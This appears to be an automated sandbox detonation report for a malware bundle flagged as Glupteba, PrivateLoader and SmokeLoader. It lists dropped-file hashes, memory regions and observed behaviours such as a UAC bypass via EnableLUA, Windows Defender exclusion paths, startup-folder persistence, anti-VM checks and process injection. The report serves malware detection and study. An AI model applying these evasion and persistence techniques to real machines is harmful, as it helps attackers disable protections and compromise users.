SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

C:\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1952-288-0x0000000002110000-0x0000000002800000-memory.dmp

memory/2508-299-0x0000000010000000-0x0000000010586000-memory.dmp

memory/2932-286-0x0000000074730000-0x0000000074E1E000-memory.dmp

\Users\Admin\Pictures\Opera_installer_2311212252533682736.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

memory/2576-317-0x0000000000400000-0x0000000000965000-memory.dmp

memory/2736-319-0x0000000001120000-0x0000000001649000-memory.dmp

memory/1804-320-0x0000000002660000-0x0000000002A58000-memory.dmp

memory/1804-323-0x0000000002660000-0x0000000002A58000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0CZ65LQNOL9IJCX00PA6.temp

MD5 db2f22c972ce46ac1eb3603174feec78
SHA1 aeb530644d1ec485e6299ad2d2eff7d967d08526
SHA256 d69de755f56d7a5d6bbb2f2e3de54af151321566c3ecf860bd456d1b2ac96d76
SHA512 9e171d0297f915aa0c7df57c855540afc1b8123cfa8eec8152ad62655bc5b81ecb170a3eb35ce366f0073731717cbe38a733cb471853bc0e4563351a071e2e09

memory/1804-327-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1868-328-0x0000000000800000-0x0000000000900000-memory.dmp

memory/1868-329-0x0000000000220000-0x0000000000246000-memory.dmp

memory/1868-330-0x0000000000400000-0x0000000000639000-memory.dmp

memory/2932-331-0x000000000AF90000-0x000000000B4B9000-memory.dmp

C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

memory/1804-334-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/540-336-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

memory/540-338-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/540-337-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/1804-335-0x0000000002660000-0x0000000002A58000-memory.dmp

memory/1952-340-0x0000000002110000-0x0000000002800000-memory.dmp

memory/540-339-0x000000001B430000-0x000000001B712000-memory.dmp

memory/540-342-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

memory/2508-344-0x00000000011B0000-0x00000000018A0000-memory.dmp

memory/2508-343-0x00000000011B0000-0x00000000018A0000-memory.dmp

memory/2508-345-0x00000000011B0000-0x00000000018A0000-memory.dmp

memory/540-341-0x0000000002220000-0x0000000002228000-memory.dmp

memory/540-347-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/540-351-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/2508-350-0x0000000000250000-0x0000000000940000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e00a39f9f6799448a06281b1e170209c
SHA1 46e197530cd7214a11ffd3269e9030cb156e31a9
SHA256 6f1f1dbdcb5dc75cd8a0cf3b615729609f836e8f75a5b6b5d1efc4b6ce412b96
SHA512 52cf64762be713666945657650d07b5853825b073b1770873f421ec2500a8258f71c49939d87361220414be374b5fc98dfcb081bfcbd26139ae08a72e6748795

\??\c:\users\admin\pictures\otynkca5mm9jshidchcmeovk.exe

MD5 cde358332e1c8373e0946480461c2632
SHA1 63863558ed8cb5e5287bee7f4441457eb8a72fc0
SHA256 4c210af24e23fc945da65700e2934898576c31e8a04212032d776dc7ba830844
SHA512 273db936d683e525d1e4c01d6bd64c24de6bca0113d5e4342c0432282c181a733ddf6640151d3aab96864ca182d08b992b28be250d532c589fd219264a5b94cd

memory/540-362-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 db2f22c972ce46ac1eb3603174feec78
SHA1 aeb530644d1ec485e6299ad2d2eff7d967d08526
SHA256 d69de755f56d7a5d6bbb2f2e3de54af151321566c3ecf860bd456d1b2ac96d76
SHA512 9e171d0297f915aa0c7df57c855540afc1b8123cfa8eec8152ad62655bc5b81ecb170a3eb35ce366f0073731717cbe38a733cb471853bc0e4563351a071e2e09

memory/2660-424-0x000000013F810000-0x000000013FDB1000-memory.dmp

memory/2764-425-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/2764-427-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp

memory/2764-430-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp

memory/2764-432-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2764-440-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2764-439-0x0000000002500000-0x0000000002580000-memory.dmp

memory/1868-431-0x0000000000400000-0x0000000000639000-memory.dmp

memory/2764-451-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp

memory/2764-426-0x00000000021F0000-0x00000000021F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NHNN7G0A1QIALH6JSOQK.temp

MD5 81bfb6712c482635b537696c85a5e0a2
SHA1 6adfd132e631b0aae06cdc47567226f7f1c7b4e2
SHA256 b996e7c6fca5ba243eba7376faba2979e2fa656087c5af75d95b9094f9e1598c
SHA512 35df0c1faa569ceaaedca1b64f3eaeb53540c866a0dd7faa00b997be9a284d86fd7e8b644bc1641ae4a75d36cd39d5363c6b59acbdb844fe79324be5e7c00ba5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 81bfb6712c482635b537696c85a5e0a2
SHA1 6adfd132e631b0aae06cdc47567226f7f1c7b4e2
SHA256 b996e7c6fca5ba243eba7376faba2979e2fa656087c5af75d95b9094f9e1598c
SHA512 35df0c1faa569ceaaedca1b64f3eaeb53540c866a0dd7faa00b997be9a284d86fd7e8b644bc1641ae4a75d36cd39d5363c6b59acbdb844fe79324be5e7c00ba5

memory/2736-514-0x0000000001120000-0x0000000001649000-memory.dmp

memory/2660-527-0x000000013F810000-0x000000013FDB1000-memory.dmp

memory/1612-528-0x00000000026A0000-0x0000000002A98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1868-530-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1524-578-0x0000000002840000-0x0000000002C38000-memory.dmp

memory/1868-589-0x0000000000400000-0x0000000000639000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 5c2be31ca24cfcf4a2c0170a04b370c2
SHA1 f914b9fae082aa2a557bfa41128195b15d2a9ea4
SHA256 3aed316b26acbbf1dbc4c2c6367b6559dd1f49b8c125c3bbd37f7084d5a9a4f0
SHA512 de69c53a55f507cfd8383103d889b4fa0df03fb253a6493cf2e5887f5fb609bf1ee04eae73560bfe91605cd163fd8d49e74d4e982794bf6fcf33e3887620532d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-21 22:51

Reported

2023-11-21 22:55

Platform

win10v2004-20231020-en

Max time kernel

64s

Max time network

158s

Command Line

C:\Windows\Explorer.EXE

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PrivateLoader

loader privateloader

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4776 created 3192 N/A C:\Windows\System32\cmd.exe C:\Windows\Explorer.EXE
PID 4776 created 3192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Explorer.EXE

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\System32\Conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" C:\Windows\System32\Conhost.exe N/A

Detected executables Discord URL observed in first stage droppers

discordurls
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\allnewumm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1JzKRfgB0B6mlpDNhxRTMYH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KeKNI0HBC3jTbaXu7F5P7HsG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CSV14BpysP5J7MQG4zJUEk8j.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qY671kJQ7AzPIoEelwuZgy8N.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LBxBdM1YkSZDVFCIrKdVFUoV.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TIvrl8AYVkg08cvMP7IdS09k.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H9PWKUBrzog8hpkvdpqSJkYl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 4624 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 4624 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 4624 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
PID 4624 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
PID 4624 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
PID 4624 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 4624 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 4624 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 4624 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Windows\System32\Conhost.exe
PID 4624 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Windows\System32\Conhost.exe
PID 4624 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Windows\System32\Conhost.exe
PID 5052 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 5052 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 5052 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 4624 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 4624 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 1536 wrote to memory of 1976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1536 wrote to memory of 1976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1536 wrote to memory of 1976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
